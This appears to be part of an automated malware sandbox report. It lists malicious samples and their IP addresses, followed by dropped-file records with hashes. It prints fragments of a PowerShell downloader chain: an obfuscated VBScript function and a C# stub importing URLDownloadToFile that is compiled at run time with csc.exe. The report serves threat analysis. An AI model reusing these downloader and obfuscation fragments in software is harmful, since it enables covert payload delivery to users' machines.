                                                                                              purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                              • 198.46.178.167
                                                                                              NET1-ASBGPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95
                                                                                              Scan docs.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.95
                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95
                                                                                              FDA50N50 ONESMI _10000.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.220
                                                                                              sh.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 93.123.85.201
                                                                                              ntpd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 93.123.85.201
                                                                                              ftp.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 93.123.85.201
                                                                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 93.123.85.201
                                                                                              sshd.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 93.123.85.201
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                              • 142.215.209.78
                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                              • 142.215.209.78
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 142.215.209.78
                                                                                              http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                              • 142.215.209.78
                                                                                              Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 142.215.209.78
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                              • 142.215.209.78
                                                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 142.215.209.78
                                                                                              grd.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                              • 142.215.209.78
                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.215.209.78
                                                                                              Email_sending_restriction_[sebastien.morel!](#HOHSM).htmlGet hashmaliciousUnknownBrowse
                                                                                              • 142.215.209.78
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Roaming\188E93\31437F.exeinvoice727282_PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                  6038732).vbsGet hashmaliciousLokibotBrowse
                                                                                                    cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                      SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                          3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                                                                                            50000PCSPIC12F1501-ESN.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exeGet hashmaliciousXWormBrowse
                                                                                                                Jdxvyx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (371), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):141862
                                                                                                                  Entropy (8bit):3.673972784160963
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:HimrsnAhOid+1d3duv8/DcFjk+2Vc3GyboSgt5pzIGwm:8AhOi01F8v8/wjk+2OGybxgt5pkGwm
                                                                                                                  MD5:100D059D24305DC95DB276AA180DC4CF
                                                                                                                  SHA1:CB2E9D345F365A0DC65B61CF40865B223C4688AD
                                                                                                                  SHA-256:87BE9D53A554146BCBAB91270C1EF35561F5168E6F84EA86C26D23B4C803247D
                                                                                                                  SHA-512:14F70627CBB1ADBB26D511D92558C471CA5354A1D0FA54A33D22D7C4933B6E1873871750F53318CD9C8D4E8B3F7627BAC2F4BAC3F295A67E2D35756AD951C8F5
                                                                                                                  Malicious:false
                                                                                                                  Preview:..........F.u.n.c.t.i.o.n. .d.e.s.e.m.p.e.n.o.(.B.y.V.a.l. .c.a.r.r.a.m.e.l.o.,. .B.y.V.a.l. .s.o.m.b.r.o.s.o.,. .B.y.V.a.l. .p.o.r.q.u.e.t.e.s.)..... . . . .D.i.m. .a.f.a.m.a.r..... . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.f.a.m.a.r. .>. .0..... . . . . . . . .c.a.r.r.a.m.e.l.o. .=. .L.e.f.t.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .-. .1.). .&. .p.o.r.q.u.e.t.e.s. .&. .M.i.d.(.c.a.r.r.a.m.e.l.o.,. .a.f.a.m.a.r. .+. .L.e.n.(.s.o.m.b.r.o.s.o.).)..... . . . . . . . .a.f.a.m.a.r. .=. .I.n.S.t.r.(.a.f.a.m.a.r. .+. .L.e.n.(.p.o.r.q.u.e.t.e.s.).,. .c.a.r.r.a.m.e.l.o.,. .s.o.m.b.r.o.s.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.e.m.p.e.n.o. .=. .c.a.r.r.a.m.e.l.o.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .s.t.d.I.n...R.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5829
                                                                                                                  Entropy (8bit):4.901113710259376
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                  MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                  SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                  SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                  SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Fri Nov 15 18:26:51 2024, 1st section name ".debug$S"
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1336
                                                                                                                  Entropy (8bit):3.9690761370281438
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:HAim9pwusNHzwKTFexmfwI+ycuZhNnakSpPNnqSSd:wnCkKTAxmo1ulna3LqSC
                                                                                                                  MD5:3648239C8DEBC2D685EBA8403E8BD092
                                                                                                                  SHA1:43345804BA51778E3A695F3FA6CFB27BD8425BDC
                                                                                                                  SHA-256:133CA9668CD785FE6ABC058EC026AC2BFBBDE28B25F4058468B4951650C8F7B7
                                                                                                                  SHA-512:F135A211B142FB30E9ED2177A9F6FD042DB0AF7EB5E14B4E762244208C3DE254BE75838C135F9A429317D3DA200E10308D064E8CC573C52B007689DC27DC4E68
                                                                                                                  Malicious:false
                                                                                                                  Preview:L...k.7g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\glmzcldr\CSCA9586F3AA915453C854280BCC33938CA.TMP..................L....a..z.=.S.`..........5.......C:\Users\user\AppData\Local\Temp\RESCCA7.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                  File Type:MSVC .res
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):652
                                                                                                                  Entropy (8bit):3.082278735136998
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVak7YnqqpPN5Dlq5J:+RI+ycuZhNnakSpPNnqX
                                                                                                                  MD5:4C1208CBFB618FDB7AEA3DCF53CF8F60
                                                                                                                  SHA1:3101F097D9E4FFB872781EE2D348208A686232EE
                                                                                                                  SHA-256:9FAF5085F9D636BA0759E24B64745F01F9073A15F6F4E5A22BED79B2CA20F7C2
                                                                                                                  SHA-512:722715C4F20E6AB85F0032D4C106A91939099B69A7B544DCC51F3B5FF20F0B7D1286F122EE0322C5A7CA8109E24453BCBC87429D8E7F49B48A6962D47CFE95B4
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.l.m.z.c.l.d.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):476
                                                                                                                  Entropy (8bit):3.7845241839287773
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:V/DsYLDS81zuGNaD9MGbJPQXReKJ8SRHy4HzNX/bt/Qy:V/DTLDfuGIAXfH1j6y
                                                                                                                  MD5:405282350B57E6D41B6D58A029558C64
                                                                                                                  SHA1:6C50EC9DD86FA438A3BC1AF48A3B49F1BC364E49
                                                                                                                  SHA-256:11A1BDC49E30FAC7BC2CBEBD22D8F4F072A449141DDD7E197F85CCB2AB331506
                                                                                                                  SHA-512:5F45C0C1451FE0C044138C44B3708BAF9468DF7D91D1201DC05FCEF629F9CAB8FD9F66CC14A37C62A189829F1DE22D4A1135813226BFF45181283F59706DE351
                                                                                                                  Malicious:false
                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace yQoNsvUYQf.{. public class uGUWof. {. [DllImport("urLmON.dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr It,string GgbyuRjDOT,string szKzr,uint pUR,IntPtr PzX);.. }..}.
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):371
                                                                                                                  Entropy (8bit):5.186690894727993
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fWQUzxs7+AEszI923fWQRn:p37Lvkmb6KzuDWZE2u+
                                                                                                                  MD5:138F8A46FA34E1C5AFF9CF34C4BF35A8
                                                                                                                  SHA1:CEE7D53CCDDEB497AE73822F19D1B9B918E99C75
                                                                                                                  SHA-256:730CF73833432D8976596942F62E8222DED79F5601873FE056430BE0C9DF0272
                                                                                                                  SHA-512:175B8A6CFCF3753D505CB551EC923407DED72385E8D5A8CBC9A19FA057764CF7C1DB6894A0DA1997F873531830866CED740EBF313A7635326CE6EB0D3A896684
                                                                                                                  Malicious:true
                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.0.cs"
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3072
                                                                                                                  Entropy (8bit):2.8143265694905186
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:etGSPPBG5eM7p8aMJzky/hfnxItkZfoKW+qqhkWI+ycuZhNnakSpPNnq:64sM+aMthfx/JvW1EH1ulna3Lq
                                                                                                                  MD5:D0D2E8773D9485A10B1BA6363AC26DBB
                                                                                                                  SHA1:1088DF396823DEE84FFB387D602CB1ACF2D15749
                                                                                                                  SHA-256:B945A9898A3CEF05EFDAB075ADA96356CEFD30F3852149F0DE9241236CE1469C
                                                                                                                  SHA-512:04F669580F4CD5A0E4C45DBC4022CE169117D0DEF29953F871050FCE5CDADB16FC3A86EE8245A7B930D71BD96CEA6D98DD8E2E1158018114763EBB6850B8473A
                                                                                                                  Malicious:false
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k.7g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....t.....t.......................................... @.....P ......R.........X.....[.....f.....l.....p...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.gl
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):870
                                                                                                                  Entropy (8bit):5.288324805922282
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:KMoqd3ka6KzTE2uKax5DqBVKVrdFAMBJTH:doika6aTE2uK2DcVKdBJj
                                                                                                                  MD5:B05929CCB78BBDD625D6AFAFBE78BFF4
                                                                                                                  SHA1:9D5A6734EFEF5D9F41C0D07CC3C185821803095D
                                                                                                                  SHA-256:0EFA6E3DBB3EF65E60E4ADB85A7E40456B5BD9B702005EE9072BACC20391395D
                                                                                                                  SHA-512:4289C87B5C50B41CEEE3E0C2DAD09AB3137F8E0EB433559BB32AF991A1A8545446B05A051347A1B4F5B38800D753DB8F9B3B27C3C9561E81CF7A2FDABC661271
                                                                                                                  Malicious:false
                                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):56368
                                                                                                                  Entropy (8bit):6.120994357619221
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                                  MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                  SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                                  SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
